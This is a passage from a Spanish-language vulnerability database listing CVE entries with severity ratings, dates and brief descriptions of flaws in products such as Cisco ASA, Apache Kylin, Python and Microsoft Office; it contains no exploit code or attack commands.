    Se presenta una vulnerabilidad de acceso No Autorizado a archivos en los Smartphones. Una explotación con éxito de esta vulnerabilidad puede afectar la confidencialidad del servicio
  • CVE-2021-39971
    Severidad: MEDIA
    Fecha de publicación: 03/01/2022
    Fecha de última actualización: 08/08/2023
    Password vault presenta una vulnerabilidad de Control Externo del Sistema o de los Ajustes de Configuración. Una explotación con éxito de esta vulnerabilidad podría comprometer la confidencialidad
  • CVE-2021-20148
    Severidad: BAJA
    Fecha de publicación: 03/01/2022
    Fecha de última actualización: 08/08/2023
    ManageEngine ADSelfService Plus versiones anteriores a la compilación 6116, almacena el archivo de política de contraseñas para cada dominio bajo la raíz html/ web con un nombre de archivo predecible basado en el nombre del dominio. Cuando ADSSP está configurado con múltiples dominios de Windows, un usuario de un dominio puede obtener la política de contraseñas de otro dominio al autenticarse en el servicio y enviando una petición especificando el archivo de política de contraseñas del otro dominio
  • CVE-2021-45458
    Severidad: MEDIA
    Fecha de publicación: 06/01/2022
    Fecha de última actualización: 21/07/2023
    Apache Kylin proporciona clases de cifrado PasswordPlaceholderConfigurer para ayudar a usuarios a cifrar sus contraseñas. En el algoritmo de cifrado usado por esta clase de cifrado, el cifrado es inicializado con una clave y un IV embebidos. Si los usuarios usan la clase PasswordPlaceholderConfigurer para cifrar su contraseña y la configuran en el archivo de configuración de kylin, se presenta el riesgo de que la contraseña pueda ser descifrada. Este problema afecta a Apache Kylin 2 versiones 2.6.6 y anteriores; Apache Kylin 3 versiones 3.1.2 y anteriores; Apache Kylin 4 versiones 4.0.0 y anteriores.
  • CVE-2021-36774
    Severidad: MEDIA
    Fecha de publicación: 06/01/2022
    Fecha de última actualización: 08/08/2023
    Apache Kylin permite a usuarios leer datos de otros sistemas de bases de datos usando JDBC. El controlador JDBC de MySQL soporta determinadas propiedades que, si no son mitigadas, pueden permitir a un atacante ejecutar código arbitrario desde un servidor MySQL malicioso controlado por un hacker dentro de los procesos del servidor Kylin. Este problema afecta a Apache Kylin 2 versiones 2.6.6 y anteriores; Apache Kylin 3 versiones 3.1.2 y anteriores.
  • CVE-2022-21837
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Microsoft SharePoint Server
  • CVE-2022-21839
    Severidad: BAJA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Denegación de Servicio en la Lista de Control de Acceso Discrecional de Windows Event Tracing
  • CVE-2021-42748
    Severidad: MEDIA
    Fecha de publicación: 10/01/2022
    Fecha de última actualización: 08/08/2023
    En Beaver Builder versiones hasta 2.5.0.3, los atacantes pueden omitir el mecanismo de protección de los controles de visibilidad por medio de la API REST
  • CVE-2021-40148
    Severidad: MEDIA
    Fecha de publicación: 04/01/2022
    Fecha de última actualización: 08/08/2023
    En el módem EMM, se presenta una posible divulgación de información debido a una falta de cifrado de datos. Esto podría conllevar a una divulgación de información remota sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del Parche: MOLY00716585; ID de Incidencia: ALPS05886933
  • CVE-2022-21840
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota de Microsoft Office
  • CVE-2022-21842
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota de Microsoft Word
  • CVE-2022-21846
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Microsoft Exchange Server. Este ID de CVE es diferente de CVE-2022-21855, CVE-2022-21969
  • CVE-2021-39623
    Severidad: ALTA
    Fecha de publicación: 14/01/2022
    Fecha de última actualización: 08/08/2023
    En la función doRead del archivo SimpleDecodingSource.cpp, se presenta una posible escritura fuera de límites debido a una comprobación de límites incorrecta. Esto podría conllevar a una escalada de privilegios remota sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12 Android-9, ID de Android: A-194105348
  • CVE-2021-45807
    Severidad: ALTA
    Fecha de publicación: 13/01/2022
    Fecha de última actualización: 08/08/2023
    jpress versión v4.2.0, es vulnerable a una ejecución de comandos por medio de io.jpress.web.admin._AddonController::doUploadAndInstall
  • CVE-2021-30311
    Severidad: ALTA
    Fecha de publicación: 13/01/2022
    Fecha de última actualización: 08/08/2023
    Un posible desbordamiento de la pila debido a una falta de comprobación del índice antes de asignar y escribir en el búfer de la pila en Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile
  • CVE-2021-30314
    Severidad: BAJA
    Fecha de publicación: 13/01/2022
    Fecha de última actualización: 08/08/2023
    Una falta de comprobación de las aplicaciones de terceros que acceden al servicio puede conllevar a una divulgación de información en Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables
  • CVE-2022-21678
    Severidad: MEDIA
    Fecha de publicación: 13/01/2022
    Fecha de última actualización: 24/07/2023
    Discourse es una plataforma de debate de código abierto. En versiones anteriores a 2.8.0.beta11 en la rama "tests-passed", la versión 2.8.0.beta11 en la rama "beta", y la versión 2.7.13 en la rama "stable", las biografías de los usuarios que hacían sus perfiles privados seguían siendo visibles en las etiquetas "(meta)" de sus páginas de usuario. El problema está parcheado en la versión 2.8.0.beta11 de "tests-passed", la versión 2.8.0.beta11 de "beta" y la versión 2.7.13 de "stable" de Discourse
  • CVE-2022-20698
    Severidad: MEDIA
    Fecha de publicación: 14/01/2022
    Fecha de última actualización: 24/07/2023
    Una vulnerabilidad en el módulo de análisis de OOXML en el software Clam AntiVirus (ClamAV) versión 0.104.1 y LTS versiones 0.103.4 y anteriores, podría permitir a un atacante remoto no autenticado causar una condición de denegación de servicio en un dispositivo afectado. La vulnerabilidad es debido a comprobaciones inapropiadas que pueden resultar en una lectura de un puntero no válido. Un atacante podría aprovechar esta vulnerabilidad mediante el envío de un archivo OOXML diseñado a un dispositivo afectado. Una explotación podría permitir al atacante causar el bloqueo del proceso de escaneo de ClamAV, resultando en una condición de denegación de servicio
  • CVE-2021-20612
    Severidad: ALTA
    Fecha de publicación: 14/01/2022
    Fecha de última actualización: 08/08/2023
    Una falta de control del administrador sobre la vulnerabilidad de seguridad en la serie MELSEC-F FX3U-ENET Firmware versión 1.14 y anteriores, FX3U-ENET-L Firmware versión 1.14 y anteriores y FX3U-ENET-P502 Firmware versión 1.14 y anteriores permite que un atacante remoto no autenticado cause una condición de denegación de servicio (DoS) en la función de comunicación del producto u otros efectos no especificados mediante el envío de paquetes especialmente diseñados a una apertura no necesaria del puerto TCP. El control por parte del PLC de la serie MELSEC-F no está afectado por esta vulnerabilidad, pero es necesario reiniciar el sistema para recuperarlo
  • CVE-2022-23095
    Severidad: MEDIA
    Fecha de publicación: 15/01/2022
    Fecha de última actualización: 08/08/2023
    Open Design Alliance Drawings SDK versiones anteriores a 2022.12.1, maneja inapropiadamente la carga de archivos JPG. Los datos de entrada no comprobados de un archivo JPG diseñado conllevan a una corrupción de la memoria. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del proceso actual
  • CVE-2021-44828
    Severidad: ALTA
    Fecha de publicación: 14/01/2022
    Fecha de última actualización: 08/08/2023
    El controlador del kernel de la GPU Arm Mali (Midgard versiones r26p0 hasta r30p0, Bifrost r0p0 a r34p0, y Valhall versiones r19p0 hasta r34p0) permite a un usuario no privilegiado conseguir acceso de escritura a la memoria de sólo lectura, y posiblemente alcanzar privilegios de root, corromper la memoria y modificar la memoria de otros procesos
  • CVE-2022-0130
    Severidad: MEDIA
    Fecha de publicación: 14/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenable.sc versiones 5.14.0 a 5.19.1, contienen una vulnerabilidad de ejecución de código remota que podría permitir a un atacante remoto no autenticado ejecutar código en circunstancias especiales. Un atacante tendría que escenificar primero un tipo de archivo específico en el root del servidor web del host de Tenable.sc antes de la explotación remota
  • CVE-2021-24909
    Severidad: MEDIA
    Fecha de publicación: 17/01/2022
    Fecha de última actualización: 02/08/2023
    El plugin ACF Photo Gallery Field de WordPress versiones anteriores a 1.7.5, no sanea y escapa del parámetro post en el archivo includes/acf_photo_gallery_metabox_edit.php antes de devolverlo en un atributo, conllevando a un problema de tipo Cross-Site Scripting Reflejado
  • CVE-2022-21684
    Severidad: MEDIA
    Fecha de publicación: 13/01/2022
    Fecha de última actualización: 24/07/2023
    Discourse es una plataforma de debate de código abierto. Las versiones anteriores a 2.7.13 en "stable", a la 2.8.0.beta11 en "beta" y a la 2.8.0.beta11 en "tests-passed" permiten a algunos usuarios iniciar sesión en una comunidad antes de lo que deberían. Un usuario invitado por medio de un correo electrónico a un foro con "must_approve_users" habilitado va a entrar automáticamente, omitiendo la comprobación que no permite a usuarios no aprobados entrar. Podrán hacer todo lo que un usuario aprobado puede hacer. Si cierran la sesión, no podrán volver a entrar. Este problema está parcheado en las versiones "stable" 2.7.13, "beta" 2.8.0.beta11 y "tests-passed" 2.8.0.beta11. Pueden deshabilitarse las invitaciones como solución. Los administradores pueden aumentar "min_trust_level_to_allow_invite" para reducir la superficie de ataque a los usuarios de mayor confianza
  • CVE-2022-23220
    Severidad: ALTA
    Fecha de publicación: 21/01/2022
    Fecha de última actualización: 08/08/2023
    USBView versiones 2.1 anteriores a 2.2, permite a algunos usuarios locales (por ejemplo, los que son conectados por SSH) ejecutar código arbitrario como root porque determinadas configuraciones de Polkit (por ejemplo, allow_any=yes) para pkexec deshabilitan el requisito de autenticación. Una ejecución de código puede, por ejemplo, usar la opción --gtk-module. Esto afecta a Ubuntu, Debian y Gentoo
  • CVE-2021-44988
    Severidad: MEDIA
    Fecha de publicación: 25/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Jerryscript versiones v3.0.0 y anteriores, contienen un desbordamiento de pila por medio de la función ecma_find_named_property en el archivo ecma-helpers.c
  • CVE-2022-23855
    Severidad: ALTA
    Fecha de publicación: 24/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Saviynt Enterprise Identity Cloud (EIC) versión 5.5 SP2.x. Una omisión de autenticación en ECM/maintenance/forgotpasswordstep1 permite a un usuario no autenticado restablecer contraseñas e iniciar sesión como cualquier cuenta local
  • CVE-2022-23856
    Severidad: MEDIA
    Fecha de publicación: 24/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Saviynt Enterprise Identity Cloud (EIC) versión 5.5 SP2.x. Un atacante puede enumerar usuarios cambiando el parámetro id, como para el URI ECM/maintenance/forgotpasswordstep1
  • CVE-2022-22704
    Severidad: ALTA
    Fecha de publicación: 06/01/2022
    Fecha de última actualización: 08/08/2023
    El paquete zabbix-agent2 versiones anteriores a 5.4.9-r1 para Alpine Linux, permite a veces la escalada de privilegios a root porque el diseño esperaba incorrectamente que systemd determinara (en efecto) parte de la configuración.
  • CVE-2021-46559
    Severidad: MEDIA
    Fecha de publicación: 26/01/2022
    Fecha de última actualización: 08/08/2023
    El firmware de los dispositivos Moxa TN-5900 versiones hasta 3.1, presenta un algoritmo débil que permite a un atacante vencer un mecanismo de inspección para la protección de la integridad
  • CVE-2021-46509
    Severidad: MEDIA
    Fecha de publicación: 27/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Cesanta MJS versión v2.20.0, contiene un desbordamiento de pila por medio de la función snquote en el archivo mjs/src/mjs_json.c
  • CVE-2021-46505
    Severidad: MEDIA
    Fecha de publicación: 27/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Jsish versión v3.5.0, contiene un desbordamiento de pila por medio de /usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5
  • CVE-2021-46507
    Severidad: MEDIA
    Fecha de publicación: 27/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Jsish versión v3.5.0, contiene un desbordamiento de pila por medio de la función Jsi_LogMsg en el archivo src/jsiUtils.c
  • CVE-2021-29846
    Severidad: MEDIA
    Fecha de publicación: 26/01/2022
    Fecha de última actualización: 08/08/2023
    IBM Security Guardium Insights versión 3.0, podría permitir a un usuario autenticado obtener información confidencial debido a una caducidad de sesión insuficiente. IBM X-Force ID: 205256
  • CVE-2022-23863
    Severidad: MEDIA
    Fecha de publicación: 28/01/2022
    Fecha de última actualización: 08/08/2023
    Zoho ManageEngine Desktop Central versiones anteriores a 10.1.2137.10, permite a un usuario autenticado cambiar la contraseña de acceso de cualquier usuario
  • CVE-2021-23484
    Severidad: ALTA
    Fecha de publicación: 28/01/2022
    Fecha de última actualización: 08/08/2023
    El paquete zip-local versiones anteriores a 0.3.5, es vulnerable a una escritura de archivos arbitrarios por medio de la extracción de archivos (Zip Slip), que puede conllevar a una extracción de un archivo diseñado fuera del directorio de extracción previsto
  • CVE-2022-24032
    Severidad: MEDIA
    Fecha de publicación: 30/01/2022
    Fecha de última actualización: 08/08/2023
    Adenza AxiomSL ControllerView versiones hasta 10.8.1, es vulnerable a la enumeración de usuarios. Un atacante puede identificar nombres de usuario válidos en la plataforma porque un intento fallido de inicio de sesión produce un mensaje de error diferente cuando el nombre de usuario es válido
  • CVE-2021-45739
    Severidad: ALTA
    Fecha de publicación: 04/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK A720R versión v4.1.5cu.470_B20200911, contiene un desbordamiento de pila en la función Form_Login. Esta vulnerabilidad permite a atacantes causar una denegación de servicio (DoS) por medio del parámetro flag
  • CVE-2021-45740
    Severidad: ALTA
    Fecha de publicación: 04/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK A720R versión v4.1.5cu.470_B20200911 contiene un desbordamiento de pila en la función setWiFiWpsStart. Esta vulnerabilidad permite a atacantes causar una denegación de servicio (DoS) por medio del parámetro pin
  • CVE-2021-45737
    Severidad: ALTA
    Fecha de publicación: 04/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK A720R versión v4.1.5cu.470_B20200911, contiene un desbordamiento de pila en la función Form_Login. Esta vulnerabilidad permite a atacantes causar una denegación de servicio (DoS) por medio del parámetro Host
  • CVE-2009-4492
    Severidad: ALTA
    Fecha de publicación: 13/01/2010
    Fecha de última actualización: 01/08/2023
    WEBrick v1.3.1 en Ruby v1.8.6 del patchlevel 383, v1.8.7 al patchlevel 248, v1.8.8dev, 1.9.1 al patchlevel 376, y v1.9.2dev ,escribe datos en un archivo de los sin depurar los caracteres no escribibles, lo que podría permitir a atacantes remotos modificar la ventana de título, o posiblemente ejecutar comandos de su elección o sobrescribir archivos, a través de una petición HTTP que contiene una secuencia de escape para el emulador de terminal.
  • CVE-2010-4831
    Severidad: MEDIA
    Fecha de publicación: 06/09/2011
    Fecha de última actualización: 03/08/2023
    Vulnerabilidad de ruta de búsqueda no segura en gdk/win32/gdkinput-win32.c in GTK+ anteriores a v2.21.8 permite a usuarios locales obtener privilegios de a través de un fichero Wintab32.dll (troyanizado) en el directorio de trabajo actual.
  • CVE-2008-1679
    Severidad: MEDIA
    Fecha de publicación: 22/04/2008
    Fecha de última actualización: 02/08/2023
    Múltiples desbordamientos de entero en imageop.c de Python versiones anteriores a 2.5.3 permiten a atacantes dependientes de contexto provocar una denegación de servicio (caída) y posiblemente ejecutar código de su elección a través de imágenes manipuladas que disparan desbordamientos de búfer basado en montículo. NOTA: esta cuestión es debida a una corrección incompleta para CVE-2007-4965.
  • CVE-2008-2315
    Severidad: ALTA
    Fecha de publicación: 01/08/2008
    Fecha de última actualización: 02/08/2023
    Múltiples desbordamientos de enteros en Python 2.5.2 y anteriores. Permite a atacantes dependientes de contexto a tener un impacto desconocido a través de vectores relacionados con el (1) stringobject, (2) unicodeobject, (3) bufferobject, (4) longobject, (5) tupleobject, y los módulos (6) stropmodule, (7) gcmodule, and (8) mmapmodule.
  • CVE-2008-2316
    Severidad: ALTA
    Fecha de publicación: 01/08/2008
    Fecha de última actualización: 02/08/2023
    Desbordamiento de entero en _hashopenssl.c en el módulo hashlib en Python 2.5.2 y anteriores. Podría permitir a atacantes dependientes del contexto vencer resúmenes criptográficos, relativos a "comprobación parcial hashlib de datos que exceden de 4GB."
  • CVE-2008-3143
    Severidad: ALTA
    Fecha de publicación: 01/08/2008
    Fecha de última actualización: 02/08/2023
    Múltiples desbordamientos de enteros en Python anterior a 2.5.2 permitiría a atacantes dependientes de contexto a tener un impacto desconocido a través de vectores relacionados con (1) Include/pymem.h; (2) _csv.c, (3) _struct.c, (4) arraymodule.c, (5) audioop.c, (6) binascii.c, (7) cPickle.c, (8) cStringIO.c, (9) cjkcodecs/multibytecodec.c, (10) datetimemodule.c, (11) md5.c, (12) rgbimgmodule.c, y (13) stropmodule.c en Modules/; (14) bufferobject.c, (15) listobject.c, y (16) obmalloc.c en Objects/; (17) Parser/node.c; y (18) asdl.c, (19) ast.c, (20) bltinmodule.c, y (21) compile.c en Python/, como ha sido indicado por "búsca desbordamiento de enteros, aportado por Google."
  • CVE-2008-3144
    Severidad: MEDIA
    Fecha de publicación: 01/08/2008
    Fecha de última actualización: 02/08/2023
    Múltiples desbordamientos de enterod en la función PyOS_vsnprintf en Python/mysnprintf.c en Python 2.5.2 y anteriores. Permite a atacantes dependientes de contexto causar denegación de servicio (corrupción de la memoria) o tiene otro impacto no especificado a través de entradas manipuladas a operaciones de formateo de cadenas de caracteres. NOTA: el manejo de ciertos valores de enteros está también influenciado por desbordamientos inferiores de enteros relacionados y un error de superación del límite (off-by-one).
  • CVE-2010-4833
    Severidad: ALTA
    Fecha de publicación: 06/09/2011
    Fecha de última actualización: 03/08/2023
    Ruta de búsqueda no segura en modules/engines/ms-windows/xp_theme.c en GTK+ anteriores a v2.24.0 permite a usuarios locales obtener privilegios de administrador a través de un fichero uxtheme.dll (troyanizado) en el directorio de trabajo actual, es una vulnerabilidad distinta a CVE-2010-4831.
  • CVE-2012-0378
    Severidad: ALTA
    Fecha de publicación: 03/05/2012
    Fecha de última actualización: 15/08/2023
    Dispositivos Cisco Adaptive Security Appliances (ASA) 5500 con software 8.0 hasta 8.4 permite a atacantes remotos provocar una denegación de servicio (exceso del límite de conexiones) realizando un gran número de conexiones "stale" que provocan un valor incorrecto en el contador de conexiones for MPF. También conocido como Bug ID CSCtv19854.
  • CVE-2011-2060
    Severidad: MEDIA
    Fecha de publicación: 22/10/2011
    Fecha de última actualización: 15/08/2023
    El componente plataform-sw en dispositivos Cisco Adaptive Security Appliances (ASA) 5500 con el software v8.2 anterior a v8.2(5.3), v8.3 anterior a v8.3(2.20), y v8.4 anteriores a v8.4(2.1) no controla correctamente los caracteres no-ASCII en la descripción de interfaz, que permite a usuarios locales provocar una denegación de servicio (recarga sin configuración) a través de una descripción manipulada, también conocido como Bug ID CSCtq50523.
  • CVE-2012-2472
    Severidad: ALTA
    Fecha de publicación: 06/08/2012
    Fecha de última actualización: 15/08/2023
    Dispositivos Cisco Adaptive Security Appliances (ASA) 5500 con software 8.2 y 8.4, cuando la inspección SIP está activada, crea idénticas pre-asignados secundarios, que podrían permitir a atacantes remotos provocar una denegación de servicio (consumo de CPU) a través diseñado el tráfico SIP , también conocido como Bug ID CSCtz63143.
  • CVE-2012-2474
    Severidad: MEDIA
    Fecha de publicación: 06/08/2012
    Fecha de última actualización: 15/08/2023
    Fuga de memoria en los dispositivos Cisco Adaptive Security Appliances (ASA) de la serie 5500 con software 8.2 a la 8.4, permite a usuarios autenticados remotamente provocar una denegación de servicio (consumo de memoria y página de respuesta vacía) mediante el uso de la opción "Clientless WebVPN". Aka Bug ID CSCth34278.
  • CVE-2011-3309
    Severidad: MEDIA
    Fecha de publicación: 02/05/2012
    Fecha de última actualización: 15/08/2023
    Cisco Adaptive Security Appliances (ASA) 5500 con el software v8.2 a v8.4 procesa las solicitudes IKE a pesar de la configuración de modo vpnclient, lo que permite a atacantes remotos obtener información sensible mediante la lectura de tráfico de respuesta IKE, también conocido como Bug ID CSCtt07749.
  • CVE-2011-4006
    Severidad: ALTA
    Fecha de publicación: 02/05/2012
    Fecha de última actualización: 15/08/2023
    La característica de inspección ESMTP en Cisco Adaptive Security Appliances (ASA) 5500 con el software v8.2 a v8.5 permite a atacantes remotos causar una denegación de servicio (consumo de CPU) a través de una secuencia de cierre no se especifica, también conocido como Bug ID CSCtt32565.
  • CVE-2012-0335
    Severidad: MEDIA
    Fecha de publicación: 02/05/2012
    Fecha de última actualización: 15/08/2023
    Los dispositivos Cisco Adaptive Security Appliances (ASA) de la serie 5500 con el software v7.2 hasta v8.4 no realiza correctamente la autenticación del proxy a través de un firewall, lo que permite a atacantes remotos obtener información sensible a través de un intento de conexión, también conocido como Bug ID CSCtx42746.
  • CVE-2012-5419
    Severidad: ALTA
    Fecha de publicación: 17/01/2013
    Fecha de última actualización: 15/08/2023
    El sofware Cisco Adaptive Security Appliance (ASA) v8.7.1 y v8.7.1.1 para el Cisco ASA 1000V Cloud Firewall permite a atacantes remotos provocar una denegación de servicio (recarga del dispositivo) a través de un paquete IPv4 H.225 y H.323 mal formados. Se trata de un problema también conocido como Bug Id CSCuc42812 y CSCuc88741.
  • CVE-2012-5717
    Severidad: MEDIA
    Fecha de publicación: 18/01/2013
    Fecha de última actualización: 15/08/2023
    Dispositivos Cisco Adaptive Security Appliances (ASA) con firmware v8.x hasta v8.4(1) no gestiona correctamente sesiones SSH, permitiendo a usuarios remotos autenticados provocar una denegación de servicio (caída de dispositivo) establecinedo múltiples sesiones, tambien conocido como Bug ID CSCtc59462.
  • CVE-2012-6395
    Severidad: MEDIA
    Fecha de publicación: 18/01/2013
    Fecha de última actualización: 15/08/2023
    Dispositivos Cisco Adaptive Security Appliances (ASA) con firmware v8.4 no valida correctamente entradas no especificadas relacionados con los nombres de ruta UNC, permitiendo a usuarios remotos autenticados provocar una denegación de servicio (caída de dispositivo) a través de vectores desconocidos, ID de error alias CSCuc65775.
  • CVE-2013-1138
    Severidad: MEDIA
    Fecha de publicación: 25/02/2013
    Fecha de última actualización: 15/08/2023
    El proceso de NAT en Cisco Adaptive Security Appliances (ASA) de dispositivos permite a atacantes remotos provocar una denegación de servicio (tabla de conexiones, consumo de memoria) a través de paquetes hechos a mano, también conocido como Bug ID CSCue46386.
  • CVE-2012-4643
    Severidad: ALTA
    Fecha de publicación: 29/10/2012
    Fecha de última actualización: 15/08/2023
    El servidor DHCP en dispositivos Cisco de las series Adaptive Security Appliances (ASA) 5500, y ASA Services Module (ASASM) en dispositivos Cisco de la serie Catalyst 6500, con software v7.0 anterior a v7.2(5.8), v7.1 anterior a v7.2(5.8), v7.2 anterior a v7.2(5.8), v8.0 anterior a v8.0(5.28), v8.1 anterior a v8.1(2.56), v8.2 anterior a v8.2(5.27), v8.3 anterior a v8.3(2.31), v8.4 anterior a v8.4(3.10), v8.5 anterior a v8.5(1.9), y v8.6 anterior a v8.6(1.5) no posiciona en memoria de forma adecuada los paquetes DHCP, lo que permite a atacantes remotos provocar una denegación de servicio (recarga de dispositivo) a través de una serie de paquetes IPv4 manipulados, también conocido como Bus ID CSCtw84068.
  • CVE-2012-4660
    Severidad: ALTA
    Fecha de publicación: 29/10/2012
    Fecha de última actualización: 15/08/2023
    El motor de inspección SIP en los dispositivos Cisco Adaptive Security Appliances (ASA) 5500, y el Módulo de Servicios de ASA (ASASM) en los dispositivos Cisco Catalyst 6500, con la versión del software anterior a la v8.2(5.17), v8.3 antes de v8.3(2.28), v8.4 antes de v8.4 (2.13) y v8.5 antes de v8.5(1.4) y v8.6 antes de v8.6(1.5), permite a atacantes remotos provocar una denegación de servicio (reinicio del dispositivo) a través de un paquete SIP modificado, también conocido como bug CSCtr63728.
  • CVE-2014-2126
    Severidad: ALTA
    Fecha de publicación: 10/04/2014
    Fecha de última actualización: 15/08/2023
    Cisco Adaptive Security Appliance (ASA) Software 8.2 anterior a 8.2(5.47), 8.4 anterior a 8.4(7.5), 8.7 anterior a 8.7(1.11), 9.0 anterior a 9.0(3.10) y 9.1 anterior a 9.1(3.4) permite a usuarios remotos autenticados ganar privilegios mediante el aprovechamiento de acceso ASDM a nivel-0, también conocido como Bug ID CSCuj33496.
  • CVE-2014-2127
    Severidad: ALTA
    Fecha de publicación: 10/04/2014
    Fecha de última actualización: 15/08/2023
    Cisco Adaptive Security Appliance (ASA) Software 8.x anterior a 8.2(5.48), 8.3 anterior a 8.3(2.40), 8.4 anterior a 8.4(7.9), 8.6 anterior a 8.6(1.13), 9.0 anterior a 9.0(4.1) y 9.1 anterior a 9.1(4.3) no procesa debidamente información de sesión de gestión durante validación de privilegios para conexiones de portal SSL VPN, lo que permite a usuarios remotos autenticados ganar privilegios mediante el establecimiento de una sesión SSL VPN sin cliente y la entrada a URLs manipuladas, también conocido como Bug ID CSCul70099.
  • CVE-2014-2128
    Severidad: MEDIA
    Fecha de publicación: 10/04/2014
    Fecha de última actualización: 15/08/2023
    La implementación SSL VPN en Cisco Adaptive Security Appliance (ASA) Software 8.2 anterior a 8.2(5.47, 8.3 anterior a 8.3(2.40), 8.4 anterior a 8.4(7.3), 8.6 anterior a 8.6(1.13), 9.0 anterior a 9.0(3.8) y 9.1 anterior a 9.1(3.2) permite a atacantes remotos evadir la autenticación a través de (1) un valor de cookie manipulada dentro de datos HTTP POST modificados o (2) una URL manipulada, también conocido como Bug ID CSCua85555.
  • CVE-2014-2129
    Severidad: ALTA
    Fecha de publicación: 10/04/2014
    Fecha de última actualización: 15/08/2023
    El motor de inspección SIP en Cisco Adaptive Security Appliance (ASA) Software 8.2 anterior a 8.2(5.48), 8.4 anterior a 8.4(6.5), 9.0 anterior a 9.0(3.1) y 9.1 anterior a 9.1(2.5) permite a atacantes remotos causar una denegación de servicio (consumo de memoria o reinicio de dispositivo) a través de paquetes SIP manipulados, también conocido como Bug ID CSCuh44052.
  • CVE-2014-3390
    Severidad: MEDIA
    Fecha de publicación: 10/10/2014
    Fecha de última actualización: 15/08/2023
    La implementación de política Virtual Network Management Center (VNMC) en Cisco ASA Software 8.7 anterior a 8.7(1.14), 9.2 anterior a 9.2(2.8), y 9.3 anterior a 9.3(1.1) permite a usuarios locales obtener acceso al root de Linux mediante el aprovechamiento de privilegios administrativos y la ejecución de una secuencia de comandos manipulada, también conocido como Bug IDs CSCuq41510 y CSCuq47574.
  • CVE-2014-3391
    Severidad: MEDIA
    Fecha de publicación: 10/10/2014
    Fecha de última actualización: 15/08/2023
    Vulnerabilidad de ruta de búsqueda no confiable en Cisco ASA Software 8.x anterior a 8.4(3), 8.5, y 8.7 anterior a 8.7(1.13) permite a usuarios locales ganar privilegios mediante la colocación de un fichero de libraría caballo de troya en la memoria externa, que conlleva al uso de la libraría después del reinicio del dispositivo debido a un valor LD_LIBRARY_PATH incorrecto, también conocido como Bug ID CSCtq52661.
  • CVE-2011-3285
    Severidad: MEDIA
    Fecha de publicación: 02/05/2012
    Fecha de última actualización: 15/08/2023
    Vulnerabilidad de ejecución CRLF en /+CSCOE+/logon.html en Cisco Adaptive Security Appliances (ASA) 5500 con software v8.0 a v8.4 permite a atacantes remotos inyectar cabeceras HTTP arbitrarias y llevar a cabo ataques de división de respuesta HTTP a través de vectores no especificados, también conocido como Bug ID CSCth63101.
  • CVE-2012-3058
    Severidad: ALTA
    Fecha de publicación: 20/06/2012
    Fecha de última actualización: 15/08/2023
    Los dispositivos Cisco Adaptive Security Appliances (ASA) 5500, y el Módulo de Servicios de ASA (ASASM) en los dispositivos Cisco Catalyst 6500, con la versión del software v8.4 antes de v8.4(4.1), v8.5 antes de v8.5(1.11), y v8.6 antes de v8.6(1.3) permite a atacantes remotos causar una denegación de servicio (reinicio del dispositivo) a través del tráfico de tránsito IPv6 que desencadena el mensaje de syslog 110003. Es un problema también conocido como Bug ID CSCua27134.
  • CVE-2013-1151
    Severidad: ALTA
    Fecha de publicación: 11/04/2013
    Fecha de última actualización: 15/08/2023
    Cisco Adaptive Security Appliances (ASA) los dispositivos con software v7.x antes de v7.2(5.10), v8.0, antes de v8.0(5.31), v8.1 y v8.2 antes de v8.2(5.38), 8.3 antes de v8.3(2.37), v8.4 antes de v8.4(5), v8.5 antes de v8.5(1.17), v8.6 antes de v8.6(1.10), y v8.7 antes de v8.7(1.3) permite a atacantes remotos provocar una denegación de servicio (recarga del dispositivo) a través de un certificado hecho a mano, también conocido como Bug ID CSCuc72408.
  • CVE-2013-1152
    Severidad: ALTA
    Fecha de publicación: 11/04/2013
    Fecha de última actualización: 15/08/2023
    Cisco Adaptive Security Appliances (ASA) los dispositivos con software v9.0 antes de v9.0(1,2) permite a atacantes remotos provocar una denegación de servicio (recarga de dispositivo) a través de un campo diseñado en un mensaje de DNS, también conocido como Bug ID CSCuc80080.
  • CVE-2013-1150
    Severidad: ALTA
    Fecha de publicación: 11/04/2013
    Fecha de última actualización: 15/08/2023
    La implementación de autenticación de proxy de Cisco Adaptive Security Appliances (ASA) los dispositivos con v7.x antes de 7.2(5.10), v8.0 antes de 8.0(5.31), v8.1 y 8.2 antes de v8.2(5.38), v8.3 antes de v8.3(2.37), v8.4 antes de v8.4(5.3), v8.5 y v8.6 antes de v8.6(1.10), v8.7 antes de v8.7(1.4), v9.0 antes de 9.0(1.1), y v9.1 antes de 9.1(1.2) permite a atacantes remotos provocar una denegación de servicio (recarga del dispositivo) a través de un URL elaborado, CSCud16590 también conocido como Bug ID.
  • CVE-2013-1149
    Severidad: ALTA
    Fecha de publicación: 11/04/2013
    Fecha de última actualización: 15/08/2023
